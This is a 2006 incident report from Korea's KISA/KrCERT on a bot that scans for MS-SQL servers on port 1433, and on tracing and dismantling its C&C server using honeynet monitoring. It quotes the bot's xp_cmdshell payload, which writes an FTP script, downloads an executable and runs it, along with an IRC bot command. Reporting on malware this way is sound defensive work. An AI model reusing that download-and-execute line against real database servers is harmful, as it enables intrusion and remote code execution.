허니넷 모니터링을 통한 봇C&C 발견 및 조치 사례

허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 

다운로드 ==>  허니넷 모니터링을 통한 봇C&C 발견 및 조치 사례.pdf

 [자료: 한국정보보호진흥원(KISA)]

__________________________________________________________________________________________
- 1 -
1. 개요
'06년 7월 중순경부터 허니넷 내 웹서버로 1433/tcp 패킷이 유입되기 시작하였다. 유입
된 패킷의 양은 많지 않았으나 특정 IP에서 지속적으로 패킷을 발생시킴에 따라 해당
시스템에 대한 조사를 수행한 결과, 변종 봇으로 보이는 바이러스(이하 "샘플1"으로 표
시)와 봇에 감염된 시스템이 5,000개 이상 접속해 있는 봇C&C(Bot Command &
Control) 서버를 발견하여 조치하였다.
본 사고노트에서는 허니넷 트래픽 모니터링부터 변종 봇의 발견, 봇C&C 서버의 확인
및 조치 등 일련의 과정을 정리하였다.
2. 피해시스템 분석
1) 트래픽 모니터링과 봇 감염PC 점검
인터넷침해사고대응지원센터에서는 허니넷 운영을 통해 윈도우 기반 시스템을 대상
으로 한 공격 정보를 수집하고 있었으며, 웹서버 및 DB에 대한 공격 정보 수집을 위
해 최근 리눅스 및 윈도우 기반의 쇼핑몰 홈페이지를 추가하였다. 추가된 홈페이지
서버 앞단에는 브릿지 방식의 방화벽을 설치하여 모든 트래픽을 모니터링하고 분석
할 수 있도록 구성하였다.
'06년 7월 중순 허니넷 방화벽 로그 기록을 확인한 결과, 추가된 윈도우 기반 웹서버에
대한 1433/tcp 접속 시도가 감지되었다. MS-SQL서버가 사용하는 1433, 1434포트에 대
한 스캔시도는 '03년 슬래머 웜 출현 이후 지속적으로 감지되어 왔지만 이번 경우는
무작위 스캔 시도가 아닌 소수의 특정 IP로부터 1433포트가 오픈되어 있는 특정 서버
로만 패킷을 전송하고 있다는 점이 달랐다.
(그림 1) '06년 7월 허니넷 1433/tcp 트래픽 현황
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 2 -
1433/tcp 패킷의 출발지 IP 중 확인 가능한 곳에 연락, 현장 방문을 통해 시스템을 확
인하였다. 방문한 현장은 모PC방으로 수십 대의 PC를 사용하고 있었는데, 1433포트
스캔을 시도한 PC의 정보는 다음과 같다.
- 운영체제 : Windows XP SP1a
- 시스템 사양 : Pentium4 3.0GHz, 512MB Memory
- 용도 : PC방 영업PC
- 특이사항 : Microsoft SQL 서버 데스크톱엔진 8.0 설치
해당 PC를 점검한 결과 다음과 같은 사항을 확인할 수 있었다.
- 해당 PC는 IRCbot, Rbot등 여러 종류의 봇에 감염되어 있었다. 특히 국내 주요 백신
프로그램이 발견하지 못하는 두 개의 봇이 실행 중 이었는데, 그 중 하나(이하 "샘플
1"로 표시)는 1433포트 스캔을 시도하는 동시에 1433이 open되어 있는 서버에 SA계
정으로 접속을 시도하고 있었다. 또 다른 봇(이하 "샘플2"로 표시)은 cmd, regedit와
같은 기본 프로그램과 ethereal과 같은 분석프로그램의 실행을 방해하고 있어 분석에
어려움을 겪었다.
NGXSLRH.EXE:1768 TCP xxxxx68:4373 xxx.xxx.66.75:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4419 xxx.xxx.29.166:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4464 xxx.xxx.17.203:ms-sql-s FIN_WAIT1
NGXSLRH.EXE:1768 TCP xxxxx68:4490 xxx.xxx.224.2:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4508 xxx.xxx.66.75:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4525 xxx.xxx.21.208:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4572 xxx.xxx.21.208:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4581 xxx.xxx.29.166:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4612 xxx.xxx.21.208:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4625 xxx.xxx.17.203:ms-sql-s FIN_WAIT1
NGXSLRH.EXE:1768 TCP xxxxx68:4640 xxx.xxx.21.208:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4680 xxx.xxx.170.74:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4734 xxx.xxx.29.166:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4737 xxx.xxx.29.166:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4749 xxx.xxx.19.75:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:4894 xxx.xxx.21.208:ms-sql-s CLOSING
NGXSLRH.EXE:1768 TCP xxxxx68:1039 xxx.xxx.149.24:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:1040 xxx.xxx.149.52:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:1126 xxx.xxx.149.122:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:1335 xxx.xxx.149.8:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:1346 xxx.xxx.149.83:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:3621 xxx.xxx.149.124:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:3967 xxx.xxx.149.43:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:3979 xxx.xxx.149.104:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:4094 xxx.xxx.149.108:ms-sql-s SYN_SENT
NGXSLRH.EXE:1768 TCP xxxxx68:4114 xxx.xxx.149.35:ms-sql-s SYN_SENT
....(하략)
(그림 2) "샘플1"에 의해 PC가 1433포트 스캔을 시도하고 있는 화면
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 3 -
- 샘플1과 샘플2 파일을 바이러스토탈 사이트에서 검사한 결과, 절반 정도의 백신프
로그램은 탐지하지 못했으며, 탐지한 백신의 경우 Rbot 및 IRCbot 변종으로 판별
하였다.
(그림 3) 바이러스토탈사이트에서 "샘플1", "샘플2"점검 결과
2) 봇(샘플1) 점검
현장 출동에서 발견한 샘플1 파일을 별도의 분리된 환경에서 실행하여 그 행위를 점
검하였다. 먼저, 해당 파일에 대한 기본 정보는 다음과 같다.
파일명 크기 MD5SUM 비고
???????.exe
(영문7자리 랜덤)
178,176 d5e6 b50c 2dc9 1d9d 6618 bab7 499d 585f 실행압축 미사용
해당 파일을 실행하면 자신의 파일명을 임의의 영문7자로 변경한 후 "C:Windows
system32"에 복사하고, 특정 서버(ee._____________.us:7000)로 접속을 시도한다. 해당
서버에 접속하면 특정 채널에 로그인 한 후 다음과 같은 명령을 봇C&C 서버로부터
수신한다.
.vvv new 100 5 0 -b -r -s
시스템을 관찰한 결과 샘플1은 상기 명령을 수신한 후 자신의 IP의 B클래스 대역을
대상으로 1433/tcp 포트를 무작위로 스캔하기 시작하였다. 스캔하는 패킷의 크기는 78
바이트이며, 분당 2,100개 정도 발생하였다.
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 4 -
스캔 도중 1433포트가 오픈되어 있는 시스템을 발견하면 해당 서버의 DB에 SA계정으
로 접속을 시도한다. 처음에는 null패스워드로 접속을 시도하고, 이후에는 랜덤으로
생성하는 패스워드로 접속을 시도한다. 테스트한 결과 한번 1433포트가 오픈되어 있는
시스템을 발견하면 SA계정 접속 시도를 무한하게 시도하는 것으로 나타났다.
SA계정으로 접속에 성공하면 아래와 같은 SQL문을 보낸다. 이 SQL쿼리를 사용하기
위해 해커는 피해시스템에 MS SQL서버 데스크톱엔진을 설치하였다.
Query: EXEC master..xp_cmdshell 'del eq&echo open 0.0.0.0 20468 >> eq&echo
user 15572 18350 >> eq &echo get Tiletgd.exe >> eq &echo quit >> eq &ftp -n
-s:eq &Tiletgd.exe&del eq
이 SQL문을 통해 해커는 해당 시스템에 특정 파일을 생성하고, 이 파일을 이용하여
ftp서버에 접속하여 파일을 다운로드 받는다. 위 SQL문을 보면 접속할 ftp서버의 IP주
소를 0.0.0.0으로 설정하였기 때문에 실제 ftp 접속은 이루어지지 않는다. 이로 미루어
보아 샘플1은 자신을 스스로 전파하지는 못하고 봇C&C서버나 윈도우의 다른 취약점
을 통해 전파되었던 것으로 보인다.
3) 봇 C&C서버 분석
아래 그림은 샘플1에 감염된 시스템이 봇C&C에 접속했을 때 나타나는 IRC 초기 접
속 메시지인데, 점검 당시 감염시스템이 7,000대가 넘은 상태였다.
(그림 4) 봇C&C 접속 시 초기 화면 메시지
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 5 -
해당 봇C&C서버의 IP주소를 확인한 결과, 국내 OO업체에서 사용하는 IP로 확인되었
다. 해당 업체의 동의를 얻어 원격접속을 통해 분석을 실시하였다.
- 운영체제 : Windows 2000 SP4 + MS SQL Server 2000 SP3
- 시스템 사양 : Pentium4 2.6GHz, 1GB memory
- 용도 : 업무용 DB서버
- 특이사항 : 해당시스템은 IDC에 위치해 있으며, 별도업체를 통해 관리
피해시스템에는 CCProxy, Radmin등 최근 해커들이 주로 사용하는 툴 이외에 봇
C&C 운영을 위해 MS Exchange Chat서버라는 IRC서버 프로그램이 설치되어 있었으
며, 기본포트인 7000/tcp와 6667/tcp가 오픈되어 있었다. CCProxy와 MS Exchange
Chat서버가 '04년 9월에 설치된 것으로 보아 피해시스템은 오래 전 해킹되어 봇C&C
서버로 악용되고 있었던 것으로 보인다.
(그림 5) 피해시스템의 MS Exchange Chat 서버 콘솔 화면
점검 당시 피해시스템에 접속해 있던 봇 감염 피해시스템은 5,000대가 넘었는데 이 중
국내IP는 전체의 1/3 정도였으며, 홍콩, 프랑스, 대만의 순서로 접속자가 분포되어 있
었다.
총접속 수 unique ip수 한국 홍콩 프랑스 타이완 미국 기타
5,008 3,587 1,227 843 352 299 224 642
해커는 피해시스템에 원격데스크톱을 통해 접속하고 있었는데, 이를 위해
TsInternetUser라는 기본계정을 administrator그룹에 등록시켜 놓았다.
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 6 -
(그림 6) TsInternetUser계정의 원격데스크톱 접속 기록
4) 조치사항
봇C&C서버의 조사를 마친 후 피해가 확산되지 않도록 다음과 같이 조치하였다.
- 해당 도메인(ee._________.us)을 DNS싱크홀 블랙리스트에 등록하여 국내사용자가 해
당 봇C&C에 접속하지 않도록 하였다.
- 봇C&C서버에 접속해 있던 봇 감염 피해시스템 중 국내IP를 분류하여 주요ISP에 통
보하여 사용자 조치를 권고하였다.
- 해당 봇C&C서버를 완전히 제거하고, 해커가 이용한 TsInternetUser계정의 권한을
기본 값인 User그룹으로 변경하고 계정 패스워드 또한 변경하였다.
- 봇C&C서버에 원격데스크톱으로 접속한 IP를 조회한 결과 해당 IP는 사우디아라비
아에 할당된 IP이었으며, 해당 국가 관련 기관에 조치를 요청하였다.
해커는 봇C&C서버가 제거된 후 다시 피해시스템에 접속을 시도하였으나
TsInternetUser계정 패스워드가 변경되어 접속에 실패하였으며, 결국 봇C&C 도메인을
국외의 다른 서버로 변경하였다.
(그림 7) 해커의 접속실패 화면
KrCERT-IN-2006-06 http://www.krcert.or.kr
허니넷 모니터링을 통한 봇C&C 발견 및 조치사례 cert@krcert.or.kr
_______________________________________________________________________________________        _
__________________________________________________________________________________________
- 7 -
3. 결론 및 보안 대책
분석결과 해커는 국내에 봇C&C서버를 설치하고, MS-SQL서버를 공격하는 변종 봇을
제작하여 배포하였다. 다만, 해커가 변종 봇에 ftp주소를 입력하지 않아 실제 DB의 sa
권한을 빼앗겨도 별다른 피해를 입지 않았으나 - 해커가 ftp주소를 넣지 않은 것은 제
작상의 실수이거나, 다른 봇을 만들기 위한 테스트과정일 것으로 추측된다 - 이를 활용
한 또 다른 봇이 출현할 가능성이 높다. 특히 DB서버만을 전문적으로 공격하기 때문에
만약 SA계정을 해킹당하는 경우 DB에 있는 모든 정보가 누출될 수 있는 위험을 가지
고 있다.
현재 이 변종 봇은 여전히 여러 시스템을 감염시키고 있으며 계속해서 스캔 트래픽
을 발생시키고 있어 사용자와 서버 관리자 모두에게 주의가 요구되고 있다. 참고로 8월
중순 확인 결과 봇C&C서버의 IP가 다시 국내IP로 변경됨에 따라 더욱 주의를 요한다.
Top 10 Scanned Ports:
Port Packets Bytes Conns
--------- --------- --------- ---------
tcp/1433 648988 16614604 48324
tcp/139 163948 11773430 15200
tcp/445 70944 5716307 5097
tcp/135 14362 978610 1710
icmp/0 4714 332367 1575
tcp/80 10600 1766650 1256
tcp/4899 2500 0 694
udp/1026 432 270301 432
tcp/22 1240 0 372
udp/137 531 75570 210
※ 위 정보는 '06년 8월 초 honeywall daily report에 나타난 정보로, 여전히 1433/tcp접속 시도가
계속되고 있음을 보여 준다
일반 사용자의 경우 최신 윈도우 보안 업데이트를 적용하고 백신 프로그램을 설치하
여 감염이 되지 않도록 주의할 필요가 있다. 윈도우XP 사용자라면 반드시 서비스팩2
를 설치할 것을 권한다. 또한 백신 프로그램의 바이러스점검DB를 계속 업데이트 하
고, 실시간 감시 기능을 활성화해야 한다.
DB서버를 운영하고 있는 경우 방화벽이나 IDS 모니터링을 통해 해당 스캔시도를 조
기에 탐지하여 차단할 필요가 있다. 또 DB에 가능하면 SA계정을 사용하지 않고, 만약
SA계정을 사용한다면 패스워드를 길고 복잡하게 설정할 것을 권한다.